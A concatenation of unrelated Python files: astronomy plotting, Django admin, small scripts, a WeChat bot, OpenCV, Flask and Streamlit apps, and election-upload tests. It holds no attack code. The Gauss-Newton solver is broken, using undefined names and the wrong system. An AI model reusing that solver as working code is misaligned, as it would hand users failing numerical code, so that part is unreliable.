return (apparant_m - term2)
#read in file of isochrones data
df = pd.read_csv('minus1point07age12.csv')
'''
to find tha abs value for the G,BP,RP mags, we need to find the distance to
according to Gaia. Thus, for m = 1.2847 and M=0, we have
'''
dist_vega = 10**((0.2*5)+(0.2*1.3847))
#querying the gaia dr2 catalog
job = Gaia.launch_job_async("SELECT \
pmra, pmdec, parallax, parallax_error, parallax_over_error, phot_bp_mean_mag, phot_rp_mean_mag, phot_g_mean_mag, \
bp_rp, bp_g,g_rp \
FROM gaiadr2.gaia_source \
WHERE CONTAINS(POINT('ICRS',gaiadr2.gaia_source.ra,gaiadr2.gaia_source.dec), CIRCLE('ICRS',245.8958,-26.5256,1))=1 \
AND parallax_error < 2 \
AND parallax_over_error > 5 \
AND pmra BETWEEN -14.5 and -10.5 \
AND pmdec BETWEEN -21 and -17 \
AND parallax BETWEEN 0.35 and 0.48")
gaia_results = job.get_results()
# creating proper motion plt
plt.figure(1)
plt.plot(gaia_results['pmra'],gaia_results['pmdec'],'.',color = 'maroon',alpha = 0.3)
plt.xlabel('Proper Motion in RA')
plt.ylabel('Proper Motion in DEC')
plt.title('Proper Motion of M4 Using Gaia Catalog')
plt.grid()
plt.savefig('gaia_m4_proper_motion.png')
#plt.show()
plt.close()
g_distance = 1/ (gaia_results['parallax']/1000.)
abs_g_mags = distance_modulus(gaia_results['phot_g_mean_mag'],g_distance)
# creating an HR diagram
plt.figure(2)
plt.plot(gaia_results['bp_rp'],abs_g_mags,'.',color = 'black',alpha=0.6,markersize = 1.5)
plt.gca().invert_yaxis()
plt.xlabel('BP - RP mag')
plt.ylabel('G mag')
plt.title('HR Diagram Using M4 in Gaia Catalog')
plt.savefig('gaia_m4_hr_bp_rp.png')
#plt.show()
plt.close()
g_avg = np.average(g_distance)
print('M4 avg distance: ', g_avg, 'number of stars: ',len(g_distance))
'''
now we want to take the HR we just created and fit isochrones to it
'''
#converting the apparent mags to abs values
tail_val =190
abs_G = distance_modulus(df['Gaia_G'].tail(tail_val),dist_vega)
abs_BP = distance_modulus(df['Gaia_BP'].tail(tail_val),dist_vega)
abs_RP = distance_modulus(df['Gaia_RP '].tail(tail_val),dist_vega)
#we then move the isochrones so that they better fir the HR
#bp_rp = (abs_BP - abs_RP) +0.55
#abs_G = abs_G +2
bp_rp = df['Gaia_BP'].tail(250) -df['Gaia_RP '].tail(250)
app_g = df['Gaia_G'].tail(250)
bp_rp = (bp_rp) +0.55
app_g = app_g +12.6
#plot
plt.figure(3)
plt.plot(bp_rp,app_g,'-',markersize=5,label='ZAMS')
plt.plot(gaia_results['bp_rp'],gaia_results['phot_g_mean_mag'],'.',color = 'black',alpha=0.6,markersize = 1.5,label='M4 HR-Diagram')
plt.gca().invert_yaxis()
plt.ylabel('G mag')
plt.xlabel('BP - RP mag')
plt.title('HR Diagram of M4 with Fitted Isochrones')
plt.legend()
plt.savefig('gaia_m4_isoschrones_fitted.png')
plt.close()
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
# Register your models here.
from .models import Customer, Addresses, Management, User, Staff, UserProfile, UserDefaultAddress
class AddressesInline(admin.TabularInline):
model = Addresses
raw_id_fields = ('user',)
search_fields = ('user',)
@admin.register(Customer)
class CustomerAdmin(admin.ModelAdmin):
list_display = ['first_name', 'last_name', 'email']
inlines = (AddressesInline,)
search_fields = ('first_name',)
ordering = ('email',)
fieldsets = (
('information', {'fields': ('email', 'first_name', 'last_name', 'phone', 'password')}),
('permissions', {'fields': ('is_active','groups', 'user_permissions',)}),
)
class Meta:
model = User
def get_queryset(self, request):
return User.objects.filter(is_staff=False)
@admin.register(Management)
class ManagementAdmin(admin.ModelAdmin):
list_display = ['first_name', 'email']
search_fields = ('first_name',)
ordering = ('email',)
fieldsets = (
('information',{'fields': ('email', 'first_name', 'last_name', 'phone', 'password')}),
('permissions', {'fields': ('is_staff','is_superuser','groups', 'user_permissions',)}),
)
class Meta:
model = User
def get_queryset(self, request):
return User.objects.filter(is_superuser=True)
@admin.register(Staff)
class StaffAdmin(admin.ModelAdmin):
list_display = ['first_name', 'email']
search_fields = ('first_name',)
ordering = ('email',)
fieldsets = (
('information', {'fields': ('email', 'first_name', 'last_name', 'phone', 'password')}),
('permissions', {'fields': ('is_staff', 'is_superuser', 'groups', 'user_permissions',)}),
)
class Meta:
model = User
def get_queryset(self, request):
return User.objects.filter(is_staff=True)
@admin.register(UserProfile)
class UserProfileAdmin(admin.ModelAdmin):
list_display = ('full_name',)
search_fields = ('full_name',)
@admin.register(UserDefaultAddress)
class UserDefaultAddressAdmin(admin.ModelAdmin):
list_display = ('user',)
search_fields = ('user',) |
def madlib():
person = input("person: ")
adjective1 = input("adjective: ")
adjective2 = input("adjective: ")
noun1 = input("noun: ")
adjective3 = input("adjective: ")
noun2 = input("noun: ")
adjective4 = input("adjective: ")
verb1 = input("verb: ")
verb2 = input("verb: ")
verb3 = input("verb: ")
madlib = f"Yesterday, {person} and I went to the park, On our way to the {adjective1} park, we saw a {adjective2} \
{noun1} on a bike. We also saw big {adjective3} balloons tied to a {noun2}. Once we got to the {adjective1} park, \
the sky turned {adjective4}. It started to {verb1} and {verb2} {person} and I {verb3} all the way home. \
Tomorrow we will try to go to the {adjective1} park again and hope it doesn't {verb1}"
print(madlib) |
# -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from django.conf import settings
from django.conf.urls.static import static
'''
urlpatterns = patterns('',
# ... the rest of your URLconf goes here ...
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
'''
urlpatterns = patterns('myproject.myapp.views',
url(r'^list/$', 'list', name='list'),
)+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from numpy import *
def GN(res,x): #Residual minimization for nonlinear least squares problems
eps = finfo(float).eps #machine epsilon from numpy
for i in range(10):
DR = cdjac(res,x)
DRT = DR.T
DFTDF = dot(DRT,DR)
s = linalg.solve(DRTDR,-DR)
x += s
def cdjac(f,x): # returns a derivative matrix df created in
# the calling routine
eps = finfo( type(x[0]) ).eps # machine epsilon from numpy
delta = eps**(1.0/3.0)*linalg.norm(x,inf);
xplus = x.copy()
xminus= x.copy()
n = x.shape[0]
df = empty((n,n))
for i in range(n):
xplus[i] += delta; # perturb one component
xminus[i]-= delta;
fplus = f(xplus);
fminus = f(xminus);
df[:,i] = (fplus-fminus)/(2*delta);
xplus[i] = x[i] # reset perturbed component
xminus[i]= x[i]
return df
res = lambda x: array([\
sqrt((x[0]+1)**2.+x[1]**2.)-1,\
sqrt((x[0]-1)**2.+(x[1]-0.5)**2.)-0.5,\
sqrt((x[0]-1)**2.+(x[1]+0.5)**2.)-0.5])
x = array([0,0.])
GN(res,x)
|
# encoding:utf-8
__author__ = 'hanzhao'
import weixin
import multiprocessing
import logging
import time
import os
import json
#
def plugin_name():
pluginname = []
for filename in os.listdir("plugins"):
if not filename.endswith(".py") or filename.startswith("_"):
continue
else :
pluginname.append(filename[:-3])
return pluginname
plugin_list = plugin_name()
print plugin_list
class PluginManager(object):
def load_config(self, id):
"""
You can load plugin config any time, then load plugin.
:typ groupid: str or unicode
"""
with open('config/plug_config.json',"r") as f:
try:
config = json.load(f)[id]['plugin_on']
print 'have'
print config
except:
config = json.load(open('config/plug_config.json',"r"))['default']['plugin_on']
return config
def open_plugin(self,id,plugname):
if plugname in plugin_list:
with open('config/plug_config.json',"r") as f:
raw_config = json.load(f)
if id in raw_config:
old_config = raw_config[id]
if plugname in raw_config[id]['plugin_on']:
pass
else:
old_config['plugin_on'].append(plugname)
raw_config[id]['plugin_on'] = old_config['plugin_on']
fp = open('config/plug_config.json',"w")
fp.write(json.dumps(raw_config))
return 1
else:
old_config = {"plugin_on":["base","rubik_tool","rubik_scramble"]}
old_config['plugin_on'].append(plugname)
raw_config[id] = old_config
fp = open('config/plug_config.json',"w")
fp.write(json.dumps(raw_config))
return 1
return 2
return None
def close_plugin(self,id,plugname):
if plugname in plugin_list and plugname!='base':
with open('config/plug_config.json',"r") as f:
raw_config = json.load(f)
print raw_config
if id in raw_config:
old_config = raw_config[id]
if plugname in old_config['plugin_on']:
plugarr = old_config['plugin_on']
plugarr.remove(plugname)
raw_config[id]['plugin_on'] = plugarr
fp = open('config/plug_config.json',"w")
fp.write(json.dumps(raw_config))
return 1
else:
if plugname in ["base","rubik_tool","rubik_scramble"]:
plugarr = ["base","rubik_tool","rubik_scramble"]
plugarr.remove(plugname)
new_config ={"plugin_on":plugarr}
raw_config[id] = new_config
fp = open('config/plug_config.json',"w")
fp.write(json.dumps(raw_config))
return 1
return 2
return None
plugmanager =PluginManager()
# plugmanager.close_plugin('ff','rubik_tool')
weiwx = weixin.WebWeixin()
weiwx.start()
def handlemsg(r):
for msg in r['AddMsgList']:
print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
# if True:
# fn = 'msg' + str(int(random.random() * 1000)) + '.json'
# with open(fn, 'w') as f:
# f.write(json.dumps(msg))
# print '[*] 该消息已储存到文件: ' + fn
# logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
srcName = weiwx.getUserRemarkName(msg['FromUserName'])
dstName = weiwx.getUserRemarkName(msg['ToUserName'])
content = msg['Content'].replace('<', '<').replace('>', '>')
msgid = msg['MsgId']
# if msgType == 1:
# cc = weiwx.getNameById(msg['FromUserName'])
# print cc
if msgType == 1:
#群聊 获取文字
# if '<br/>' in content:
# [name,content] = content.split('<br/>')
if msg['FromUserName'][:2] == '@@':
config_save_name = weiwx.getGroupName(msg['FromUserName']).decode('utf') #这里要解码否则会无法匹配到
else:
config_save_name = str(weiwx.getAttrStatusById(msg['FromUserName']))
print config_save_name
plugin_list_user_or_group = plugmanager.load_config(config_save_name)
print plugin_list_user_or_group
for plug in plugin_list_user_or_group:
plugin=__import__("plugins."+plug, fromlist=[plug])
ans = plugin.run(content)
if ans is not None : #插件设置模块
if ans.startswith('command'):
print ans
if ans == 'command list plugin':
ans = str(plugmanager.load_config(config_save_name))
elif ans.startswith('command open plugin'):
plugname = ans.split(':')[1]
status = plugmanager.open_plugin(config_save_name,plugname)
if status == 1:
ans = '插件' + plugname + '成功开启'
else:
ans ='插件' + plugname + '开启失败'
elif ans.startswith('command close plugin'):
plugname = ans.split(':')[1]
status = plugmanager.close_plugin(config_save_name,plugname)
if status == 1:
ans = '插件' + plugname + '成功删除'
else:
ans ='插件' + plugname + '关闭失败'
else:
pass
weiwx.webwxsendmsg(ans, msg['FromUserName'])
def listenMsgMode(wx):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
wx._run('[*] 进行同步线路测试 ... ', wx.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
lastCheckTs = time.time()
[retcode, selector] = wx.synccheck()
print 'retcode: %s, selector: %s' % (retcode, selector)
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
break
elif retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2'or '6':
r = wx.webwxsync()
if r is not None:
handlemsg(r)
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = wx.webwxsync()
elif selector == '0':
time.sleep(1)
# if (time.time() - lastCheckTs) <= 10:
# time.sleep(10 - time.time() + lastCheckTs)
print str(time.time()-lastCheckTs)
listenMsgMode(weiwx)
|
#!/usr/bin/env python
import time as time
import numpy as np
import cv2
from pkg_resources import parse_version
display = True
width = 640
height = 480
ntries = 10
jitter = 1
OPCV3 = parse_version(cv2.__version__) >= parse_version('3')
# returns OpenCV VideoCapture property id given, e.g., "FPS"
def vidProperty(prop):
return getattr(cv2 if OPCV3 else cv2.cv, ("" if OPCV3 else "CV_") + "CAP_PROP_" + prop)
def XXXgetContours( image ):
## blur = cv2.pyrMeanShiftFiltering( image, 21, 36 )
blur = cv2.GaussianBlur(image, (5, 5), 0)
gray = cv2.cvtColor( blur, cv2.COLOR_BGR2GRAY )
ret, threshold = cv2.threshold( gray, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU )
rv,z = cv2.findContours( threshold, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE )
return rv
def getContours( image ):
# threshold image
ret, threshed_img = cv2.threshold(cv2.cvtColor(image, cv2.COLOR_BGR2GRAY), 127, 255, cv2.THRESH_BINARY)
# find contours and get the external one
contours, hier = cv2.findContours(threshed_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
return contours
def showContours( image, lst ):
if display:
return cv2.drawContours( image, lst, -1, (0,255,0), 2 )
return None
def writeText( image, at, txt, colour ):
if colour == None:
colour = (0,0,0)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText( image, txt, at, font, 0.4, colour, 2 )
def boundingCircles( image, clist ):
ix = 0
for c in clist:
(x,y),rad = cv2.minEnclosingCircle( c )
centre = (int(x),int(y))
radius = int( rad )
if radius > 20 and radius < 200:
cv2.circle( image, centre, radius, (0,255,0), 2 )
txt = "R=%s" % radius
writeText( image, centre, txt, (0,255,0) )
ix += 1
def boundingBoxes( image, clist ):
rv = []
for c in clist:
x,y,w,h = cv2.boundingRect(c)
if h > (int(0.8*height)) or w > int(width/2):
continue
if w > 40 and h > 80:
rv.append( (x,y,w,h) )
return rv
def webCam( num ):
stream = cv2.VideoCapture( num )
if stream.isOpened() == False:
print "Cannot open input video stream!"
exit()
height = stream.get( vidProperty( 'FRAME_HEIGHT' ) )
width = stream.get( vidProperty( 'FRAME_WIDTH' ) )
sat = stream.get( vidProperty( 'SATURATION' ) )
con = stream.get( vidProperty( 'CONTRAST' ) )
fps = stream.get( vidProperty( 'FPS' ) )
print "camera opened: image size ", width, "x", height
print "sat: %s con: %s fps: %s" % ( sat, con, fps )
## stream.set( vidProperty( 'FRAME_HEIGHT' ), int( height/2 ) )
## stream.set( vidProperty( 'FRAME_WIDTH' ), int( width/2 ) )
stream.set( vidProperty( 'FPS' ), 27 )
stream.set( vidProperty( 'SATURATION' ), sat/2 )
stream.set( vidProperty( 'CONTRAST' ), con*2 )
return stream
def getFrame( stream ):
rv, frame = stream.read()
if rv:
return frame
return None
def show( image ):
if not display:
return False
cv2.imshow( 'Display',image )
if cv2.waitKey(jitter) & 0xff == 'q':
return True
return False
def save( image, file ):
cv2.imwrite( file, image )
def obatts( bx ):
x = bx[0]
y = bx[1]
w = bx[2]
h = bx[3]
return ( x, y, w, h )
def getObjects( cam ):
frame = None
while frame is None:
frame = getFrame( cam )
contours = None
while contours is None:
contours = getContours( frame )
bbxs = boundingBoxes( frame, contours )
rv = []
for bx in bbxs:
x,y,w,h = obatts( bx )
rv.append( (w,h) )
if display:
txt = "(%d x %d)" % (w,h)
cv2.rectangle( frame, (x,y), (x+w,y+h), (0,223,0), 2 )
writeText( frame, (int(x+(w/4)),int(y+(h/2))), txt, (0,223,0) )
if show( frame ):
exit( 0 )
return rv
def deJitter( cam, n ):
x = {}
y = {}
ix = n
while ix > 0:
ix -= 1
ob = getObjects( cam )
i = 0
while i < len( ob ):
if i in x:
x[i] += ob[i][0]
y[i] += ob[i][1]
else:
x[i] = ob[i][0]
y[i] = ob[i][1]
i += 1
i = 0
rv = []
while i < len( x ):
t = ( int( x[i]/n ), int( y[i]/n ) )
rv.append( t )
i += 1
return rv
def getSize( cam, n ):
x = 0
y = 0
ix = n
rv = []
while ix > 0:
frame = None
while frame is None:
frame = getFrame( cam )
contours = None
while contours is None:
contours = getContours( frame )
bb = boundingBoxes( frame, contours )
if len( bb ) > 0:
x += bb[0][0]
y += bb[0][1]
ix -= 1
if show( frame ):
exit( 0 )
rv.append( ( int(x/n), int(y/n) ) )
return rv
def main():
cam = webCam( 0 )
start = time.time()
for ix in range( 30 ):
frame = getFrame( cam )
end = time.time()
print "30 frames in %s seconds." % str( end - start )
while True:
start = time.time()
## box = getSize( cam, ntries )
ob = deJitter( cam, ntries )
bbx = time.time()
print "%d objects sampled %s times %s %s." % ( len( ob ), ntries, ob, str( bbx - start ) )
## print "bbx calc: %s %s" % ( str( bbx - start ), box )
## boundingCircles( frame, contours )
save( frame, 'save.jpg' )
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
"""Add message status and payload
Revision ID: 19e4d92b2bef
Revises: 4bd072d67d85
Create Date: 2020-04-16 12:34:03.014993
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '19e4d92b2bef'
down_revision = '4bd072d67d85'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('message', sa.Column('payload', sa.JSON(), nullable=True))
op.add_column('message', sa.Column('status', sa.Enum('received', 'confirmed', 'revoked', 'undeliverable', name='messagestatus', native_enum=False), nullable=True))
op.drop_column('message', 'predicate')
op.drop_column('message', 'obj')
op.drop_column('message', 'subject')
op.drop_column('message', 'receiver')
op.drop_column('message', 'sender')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('message', sa.Column('sender', sa.VARCHAR(length=8), autoincrement=False, nullable=True))
op.add_column('message', sa.Column('receiver', sa.VARCHAR(length=8), autoincrement=False, nullable=True))
op.add_column('message', sa.Column('subject', sa.VARCHAR(length=1024), autoincrement=False, nullable=True))
op.add_column('message', sa.Column('obj', sa.VARCHAR(length=1024), autoincrement=False, nullable=True))
op.add_column('message', sa.Column('predicate', sa.VARCHAR(length=1024), autoincrement=False, nullable=True))
op.drop_column('message', 'status')
op.drop_column('message', 'payload')
# ### end Alembic commands ###
|
import streamlit as st
import detection as dtc
import imutils
import datetime
import cv2
import os
import pandas as pd
import torch
# GUI header
st.set_page_config("Social Distancing Detector", None, "wide")
st.title('Automated Social Distancing Monitoring System :walking::walking:')
st.subheader('COS30018 Assignment Project Topic 3 - Social Distancing Monitoring System')
st.write("Do you want to use NVIDIA CUDA GPU? :desktop_computer:")
cuda = st.selectbox('', ('No', 'Yes'))
if cuda == "Yes":
print(1)
model = torch.hub.load('ultralytics/yolov5', 'custom', path = 'weights/best.pt')
model.cuda('cuda:0')
elif cuda == "No":
print(0)
model = torch.hub.load('ultralytics/yolov5', 'custom', path = 'weights/best.pt')
st.write("")
st.write("Minimum confidence for the model to detect human")
MIN_CONF = st.slider('', 0.0, 1.0, 0.7)
st.subheader('Image detector :frame_with_picture:')
st.write('Upload your image to be analysed')
st.write('Note: Make sure the file is located in the images folder')
img = st.file_uploader('Image')
MIN_CONF = float(MIN_CONF)
DISTANCE = 40
if img is not None:
path = img.name
img = cv2.imread('images/' + path)
img, violation = dtc.bird_detect_people_on_frame(img, MIN_CONF, DISTANCE, img.shape[1], img.shape[0], model)
st.success("Image successfully analysed")
st.image(img, caption='Image detection result')
st.subheader('Video detector :film_frames:')
st.write('Upload your video to be analysed')
st.write('Note: Make sure the file is located in the videos folder')
vid = st.file_uploader('Video')
if vid is not None:
path = vid.name
vid = "videos/" + path
video = cv2.VideoCapture(vid)
frame_count = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
violations = dtc.bird_detect_people_on_video(vid, MIN_CONF, DISTANCE, model)
path = 'bird_output.avi'
compressed_path = path.split('.')[0]
compressed_path = 'compressed_' + compressed_path + '.mp4'
if os.path.exists(compressed_path):
os.remove(compressed_path)
# Convert video
os.system(f"ffmpeg -i {path} -vcodec libx264 -nostdin {compressed_path} ")
print(compressed_path)
st.success("Video successfully analysed")
st.video('compressed_bird_output.mp4', 'video/mp4', 0)
# add graphs
FPS = video.get(cv2.CAP_PROP_FPS)
data = pd.DataFrame({'Violations':violations})
st.subheader('Violations for each frame in the video :warning:')
st.line_chart(data, height = 500)
st.info("Design & Developed By MACE For COS30018 Intelligent Systems Assignment")
|
from flask import Flask, render_template, request
# importing the earth engine
import ee
ee.Initialize()
from IPython.display import Image,display
from datetime import date , timedelta
from datetime import datetime
import folium
import pygeoj
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/',methods=['POST'])
def calculate():
start_date = request.form['startdate']
end_date = request.form['enddate']
data = request.form['data']
'''geometry = request.form['polygon']
a = pygeoj.load(geometry)
for feature in a:
roi = (feature.geometry.coordinates)
region = ee.Geometry.MultiPolygon(roi)
print(region)'''
def ndvi(start_date,end_date):
image = ee.ImageCollection('LANDSAT/LC08/C01/T1_TOA').filterDate(start_date,end_date).filterMetadata('CLOUD_COVER','less_than',20).median()
print(image)
nir = image.select('B5')
red = image.select('B4')
ndvi = nir.subtract(red).divide(nir.add(red))
viz_parameter = {'min':-0.4,'max':0.5,'palette': ['blue','white','DarkGreen']}
map_id_dict = ee.Image(ndvi).getMapId(viz_parameter)
tile = str(map_id_dict['tile_fetcher'].url_format)
print(tile)
return tile
def dem():
image = ee.Image("USGS/SRTMGL1_003")
viz_parameter = {'min':0,'max':3000,'palette': ['white','black','red']}
map_id_dict = ee.Image(image).getMapId(viz_parameter)
tile = str(map_id_dict['tile_fetcher'].url_format)
print(tile)
# return "hi i calaculated"
return tile
def ndbi(start_date,end_date):
image = ee.ImageCollection('LANDSAT/LC08/C01/T1_TOA').filterDate(start_date,end_date).filterMetadata("CLOUD_COVER",'less_than',10).median()
swir = image.select('B6')
nir = image.select('B5')
ndbi = swir.subtract(nir).divide(swir.add(nir))
viz_parameter = {'min':-0.6,'max':0.2,'palette': ['blue','008000','red']}
map_id_dict = ee.Image(ndbi).getMapId(viz_parameter)
tile = str(map_id_dict['tile_fetcher'].url_format)
return tile
def ndwi(start_date,end_date):
image = ee.ImageCollection('LANDSAT/LC08/C01/T1_TOA').filterDate(start_date,end_date).filterMetadata("CLOUD_COVER",'less_than',10).median()
GREEN = image.select("B3")
SWIR = image.select("B6")
ndwi_image = GREEN.subtract(SWIR).divide(GREEN.add(SWIR))#calculate the ndwi
viz_parameter = {'min':-0.4,'max':0.5,'palette': ['green','red','blue']}
map_id_dict = ee.Image(ndwi_image).getMapId(viz_parameter)
tile = str(map_id_dict['tile_fetcher'].url_format)
print(tile)
return tile
def slope():
image = ee.Image("USGS/SRTMGL1_003")
slope = ee.Terrain.slope(image)
viz_parameter = {'min':0,'max':60,'palette': ['white','black','red']}
map_id_dict = ee.Image(slope).getMapId(viz_parameter)
tile = str(map_id_dict['tile_fetcher'].url_format)
print(tile)
return tile
def forest():
forest_image = ee.Image("UMD/hansen/global_forest_change_2019_v1_7")
forest_visual = {'bands': ['loss', 'treecover2000', 'gain'],'max': [1, 255, 1]}
map_id_dict = ee.Image(forest_image).getMapId(forest_visual)
# forest loss as red, and forest gain as blue
tile = str(map_id_dict['tile_fetcher'].url_format)
return tile
if (data == 'ndvi'):
data1 = ndvi(start_date, end_date)
return render_template('index.html',tiles = data1, title = 'NDVI')
elif (data == 'ndbi'):
data1 = ndbi(start_date,end_date)
return render_template('index.html',tiles=data1, title = 'NDBI')
elif (data == 'ndwi'):
data1 = ndwi(start_date,end_date)
return render_template('index.html',tiles=data1, title = 'NDWI')
elif(data == 'dem'):
data1=dem()
return render_template('index.html',tiles=data1, title = 'DEM')
elif(data == 'slope'):
data1 = slope()
return render_template('index.html',tiles = data1, title = 'SLOPE')
elif(data == 'forest'):
data1 = forest()
return render_template('index.html',tiles = data1, title = 'Forest Change')
else:
data1=dem()
return render_template('index.html',tiles=data1)
if __name__ == "__main__":
app.run(debug=True) |
from datetime import date
from uuid import uuid4
from onegov.ballot import ElectionCompound, Election
from onegov.core.utils import module_path
from tests.onegov.election_day.common import login
from webtest import TestApp as Client
from webtest import Upload
from unittest.mock import patch
def add_data_source(client, name='name', upload_type='vote', fill=False):
login(client)
manage = client.get('/manage/sources/new-source')
manage.form['name'] = 'source'
manage.form['upload_type'] = upload_type
manage = manage.form.submit().follow()
token = manage.pyquery(('h2 small')).text().split('/')[1].strip()
id_ = manage.request.url.split('/source/')[1].split('/')[0]
if fill:
if upload_type == 'vote':
manage = client.get('/manage/votes/new-vote')
manage.form['vote_de'] = 'item'
manage.form['date'] = '2015-01-01'
manage.form['domain'] = 'federation'
manage.form.submit()
else:
manage = client.get('/manage/elections/new-election')
manage.form['election_de'] = 'item'
manage.form['date'] = '2015-01-01'
manage.form['mandates'] = 1
manage.form['election_type'] = upload_type
manage.form['domain'] = 'federation'
manage.form.submit()
manage = client.get('/manage/source/{}/items/new-item'.format(id_))
manage.form['item'] = 'item'
manage.form['district'] = '1'
manage.form['number'] = '2'
manage = manage.form.submit().follow()
return id_, token
def regenerate_token(client, id_):
login(client)
client.get('/data-source/{}/generate-token'.format(id_)).form.submit()
manage = client.get('/manage/source/{}/items'.format(id_))
token = manage.pyquery(('h2 small')).text().split('/')[1].strip()
return token
def test_view_wabstic_authenticate(election_day_app_zg):
client = Client(election_day_app_zg)
urls = ('vote', 'majorz', 'proporz')
def post(url):
return client.post('/upload-wabsti-{}'.format(url), expect_errors=True)
assert all((post(url).status_code == 403 for url in urls))
client.authorization = ('Basic', ('', 'password'))
assert all((post(url).status_code == 403 for url in urls))
id_, token = add_data_source(Client(election_day_app_zg))
assert all((post(url).status_code == 403 for url in urls))
client.authorization = ('Basic', ('', token))
assert all((post(url).status_code == 200 for url in urls))
regenerate_token(Client(election_day_app_zg), id_)
assert all((post(url).status_code == 403 for url in urls))
def test_view_wabstic_translations(election_day_app_zg):
id_, token = add_data_source(Client(election_day_app_zg), fill=True)
client = Client(election_day_app_zg)
client.authorization = ('Basic', ('', token))
params = (
('sg_geschaefte', Upload('sg_geschaefte.txt', 'a'.encode('utf-8'))),
('sg_gemeinden', Upload('sg_gemeinden.txt', 'a'.encode('utf-8'))),
)
# Default
result = client.post('/upload-wabsti-vote')
assert result.json['errors']['sg_gemeinden'] == ['This field is required.']
result = client.post('/upload-wabsti-majorz')
assert result.json['errors']['data_source'] == [
'The data source is not configured properly'
]
result = client.post('/upload-wabsti-vote', params=params)
assert result.json['errors']['item'][0]['message'] == (
'Not a valid xls/xlsx file.'
)
# Invalid header
headers = [('Accept-Language', 'xxx')]
result = client.post('/upload-wabsti-vote', headers=headers)
assert result.json['errors']['sg_gemeinden'] == ['This field is required.']
result = client.post('/upload-wabsti-majorz', headers=headers)
assert result.json['errors']['data_source'] == [
'The data source is not configured properly'
]
result = client.post('/upload-wabsti-vote', headers=headers, params=params)
assert result.json['errors']['item'][0]['message'] == (
'Not a valid xls/xlsx file.'
)
# German
headers = [('Accept-Language', 'de_CH')]
result = client.post('/upload-wabsti-vote', headers=headers)
assert result.json['errors']['sg_gemeinden'] == [
'Dieses Feld wird benötigt.'
]
result = client.post('/upload-wabsti-majorz', headers=headers)
assert result.json['errors']['data_source'] == [
'Die Datenquellekonfiguration ist ungültig'
]
result = client.post('/upload-wabsti-vote', headers=headers, params=params)
assert result.json['errors']['item'][0]['message'] == (
'Keine gültige XLS/XLSX Datei.'
)
# Italian
headers = [('Accept-Language', 'it_CH')]
result = client.post('/upload-wabsti-vote', headers=headers)
assert result.json['errors']['sg_gemeinden'] == [
'Questo campo è obbligatorio.'
]
result = client.post('/upload-wabsti-majorz', headers=headers)
assert result.json['errors']['data_source'] == [
'L\'origine dati non è configurata correttamente'
]
result = client.post('/upload-wabsti-vote', headers=headers, params=params)
assert result.json['errors']['item'][0]['message'] == (
'Nessun file XLS/XLSX valido.'
)
def test_view_wabstic_vote(election_day_app_zg):
id_, token = add_data_source(Client(election_day_app_zg), fill=True)
client = Client(election_day_app_zg)
client.authorization = ('Basic', ('', token))
params = [
(name, Upload(f'{name}.csv', 'a'.encode('utf-8')))
for name in ('sg_geschaefte', 'sg_gemeinden')
]
with patch(
'onegov.election_day.views.upload.wabsti_exporter.import_vote_wabstic'
) as import_:
result = client.post('/upload-wabsti-vote', params=params)
assert import_.called
assert '1' in import_.call_args[0]
assert '2' in import_.call_args[0]
assert result.json['status'] == 'success'
def test_view_wabstic_majorz(election_day_app_zg):
id_, token = add_data_source(
Client(election_day_app_zg),
upload_type='majorz',
fill=True
)
client = Client(election_day_app_zg)
client.authorization = ('Basic', ('', token))
params = [
(name, Upload(f'{name}.csv', 'a'.encode('utf-8')))
for name in (
'wm_wahl',
'wmstatic_gemeinden',
'wm_gemeinden',
'wm_kandidaten',
'wm_kandidatengde'
)
]
with patch(
'onegov.election_day.views.upload.wabsti_exporter'
'.import_election_wabstic_majorz'
) as import_:
result = client.post('/upload-wabsti-majorz', params=params)
assert import_.called
assert '1' in import_.call_args[0]
assert '2' in import_.call_args[0]
assert result.json['status'] == 'success'
def test_view_wabstic_proporz(election_day_app_zg):
id_, token = add_data_source(
Client(election_day_app_zg),
upload_type='proporz',
fill=True
)
client = Client(election_day_app_zg)
client.authorization = ('Basic', ('', token))
params = [
(name, Upload(f'{name}.csv', 'a'.encode('utf-8')))
for name in (
'wp_wahl',
'wpstatic_gemeinden',
'wp_gemeinden',
'wp_listen',
'wp_listengde',
'wpstatic_kandidaten',
'wp_kandidaten',
'wp_kandidatengde',
)
]
with patch(
'onegov.election_day.views.upload.wabsti_exporter'
'.import_election_wabstic_proporz'
) as import_:
result = client.post('/upload-wabsti-proporz', params=params)
assert import_.called
assert '1' in import_.call_args[0]
assert '2' in import_.call_args[0]
assert result.json['status'] == 'success'
def test_create_elections_wabsti_proporz(election_day_app_sg):
test_file = module_path(
'tests.onegov.election_day', 'fixtures/wabstic_243/WP_Wahl.csv')
id_, token = add_data_source(
Client(election_day_app_sg),
name='Verbundene Wahlen KR',
upload_type='proporz',
fill=False
)
params = [
('wp_wahl', Upload(test_file, content_type='text/plain')),
('wp_listen', Upload('wp_listen.csv', 'a'.encode('utf-8'),
content_type='text/plain'))
]
client = Client(election_day_app_sg)
